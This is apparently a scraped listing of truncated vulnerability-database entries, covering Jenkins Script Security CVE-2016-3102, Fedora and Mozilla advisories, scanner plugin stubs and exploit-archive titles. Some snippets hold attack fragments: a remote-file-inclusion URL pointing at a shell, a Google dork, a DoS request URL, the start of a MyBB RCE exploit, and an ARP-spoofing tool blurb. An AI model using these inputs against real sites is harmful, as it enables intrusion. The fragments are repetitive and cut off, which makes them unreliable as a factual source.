Design/Logic Flaw

The Script Security plugin before 1.18.1 in Jenkins might allow remote attackers to bypass a Groovy sandbox protection mechanism via a plugin that performs 1 direct field access or 2 get/set array operations...

CVE-2016-3102

The Script Security plugin before 1.18.1 in Jenkins might allow remote attackers to bypass a Groovy sandbox protection mechanism via a plugin that performs 1 direct field access or 2 get/set array operations...

CVE-2016-3102

The Script Security plugin before 1.18.1 in Jenkins might allow remote attackers to bypass a Groovy sandbox protection mechanism via a plugin that performs 1 direct field access or 2 get/set array operations...

CVE-2016-3102

The CVE-2016-3102 issue affects the Jenkins Script Security plugin prior to 1.18.1, where a plugin that performs direct field access or get/set array operations could bypass the Groovy sandbox protection. Affected product: Jenkins Script Security plugin (versions

Fedora Update for jenkins-script-security-plugin FEDORA-2015-5643

The remote host is missing an update for the SPDX-FileCopyrightText: 2015 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

Fedora 21 : jenkins-script-security-plugin-1.13-2.fc21 / groovy-sandbox-1.8-1.fc21 / etc (2015-5637)

Fix CVE-2015-1806 SECURITY-125 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. %NASLMINLEVEL 70300 C...

Fedora Update for jenkins-script-security-plugin FEDORA-2015-5637

The remote host is missing an update for the SPDX-FileCopyrightText: 2015 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

[LANs.py] Capture and inject traffic on LAN

Multithreaded asynchronous packet parsing/injecting arp spoofer. Individually arpspoofs the target box, router and DNS server if necessary. Does not poison anyone else on the network. Displays all most the interesting bits of their traffic and can inject custom html into pages they visit. Cleans ...

DVWA learn PHP Common Vulnerabilities and repair method-vulnerability warning-the black bar safety net

“Security is a whole, to ensure that security is not to powerful where there is more powerful and that the real weakness of the place where the”--Kenshin From a lot of the penetration of large enterprises within the network of cases of view, the intruder most from on the Web to find the...

NICE PHP FAQ Script CSRF Vulnerability

Exploit for php platform in category web applications Exploit Title: NICE PHP FAQ Script CSRF Author: Jonturk75 Vendor or Software Link: http://www.scripts.com/viewscript/nice-php-faq-script-designer-seo/24292/ Category:: webapps Demo : http://www.nicephpscripts.com/scripts/faqscript/admin Greetz...

Mozilla Foundation Security Advisory 2012-05

Mozilla Foundation Security Advisory 2012-05 Title: Frame scripts calling into untrusted objects bypass security checks Impact: Critical Announced: January 31, 2012 Reporter: mozbugra4 Products: Firefox, Thunderbird, SeaMonkey Fixed in: Firefox 10.0 Thunderbird 10.0 SeaMonkey 2.7 Description...

Frame scripts calling into untrusted objects bypass security checks — Mozilla

Mozilla security researcher mozbugra4 reported that frame scripts bypass XPConnect security checks when calling untrusted objects. This allows for cross-site scripting XSS attacks through web pages and Firefox extensions. The fix enables the Script Security Manager SSM to force security checks on...

LabWiki Multiple Cross-site Scripting (XSS) and Shell Upload Vulnerabilities

LabWiki is prone to multiple cross-site scripting and shell upload vulnerabilities. SPDX-FileCopyrightText: 2011 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescripti...

Mozilla Firefox and SeaMonkey Java LiveConnect Script Security Bypass Vulnerability

CVE:CVE-2010-3775 Bugtraq ID:45355 Mozilla Firefox and SeaMonkey are prone to a security-bypass vulnerability. Attackers can exploit this issue to bypass security restrictions and obtain elevated privileges such as the abilities to read local files, launch processes, and create network connection...

Infocus Real Estate Enterprise Edition Script - Authentication Bypass

Infocus Real Estate Enterprise Edition Script - Authentication Bypass Authentication bypass in Infocus Real Estate Enterprise Edition script Vendor:www.instantrankingseo.com Author:Sid3^effects aKa haRi Description : Infocus Real Estate Enterprise Edition, is a complete power packed script with...

TinyButStrong 3.4.0 File Disclosure

' -. ,'-. ,' ' .--.===.--. ' .%%. .. -'=' /%%/ \ |%%/ local | |%%| ||.,-. %%| file |/ %\ // ' %\ include // , -'-. ,-. %\ /' ' |/' -=--=' ' -=-=- .' ||/ |||/ o o -=-=-=-==-=-=-=-=-=-=-=+-oooO---------+-=-=-=-=-=-=- | | | | script:TinyButStrong version 3.4.0...

MyBulletinBoard (MyBB) <= 1.2.3 Remote Code Execution Exploit

No description provided by source. !/usr/bin/php ?php errorreportingEALL ^ ENOTICE; http://www.milw0rm.com/exploits/2012 They corrected not all a lot of SQL requests which use the ipaddress, with $db-escapestring. They don't corrected the function this is a choice ... the bad and they forgot to...

Maian Recipe 1.0 - 'path_to_folder' Remote File Inclusion

Found by Denven Script: http://www.maianscriptworld.co.uk/freestuff1975recipe.html Google Dork: "Powered by Maian Recipe v1.0" ERROR: classes/classmail.inc.php : include$pathtofolder.'classes/class.phpmailer.php'; RFI: http://www.SITE.com/path/classes/classmail.inc.php?pathtofolder=shell...

уязвимости скриптов с www.wr-script.ru (wr-board 1.4Lite)

1 DoS. Не проверяется значение параметра page в index.php http://wr-script.host/board/index.php?event=list&id=112420973596&page=-10000000000000000 2 Открытая почтовая форма. Адрес по которому будет отправлено сообщение с доски передается в поле uemail hidden. Пример использования:...

FreeBSD : mozilla -- 'Wrapped' javascript: urls bypass security checks (a81746a1-c2c7-11d9-89f7-02061b08fc24)

A Mozilla Foundation Security Advisory reports : Some security checks intended to prevent script injection were incorrect and could be bypassed by wrapping a javascript: url in the view-source : pseudo-protocol. Michael Krax demonstrated that a variant of his favicon exploit could still execute...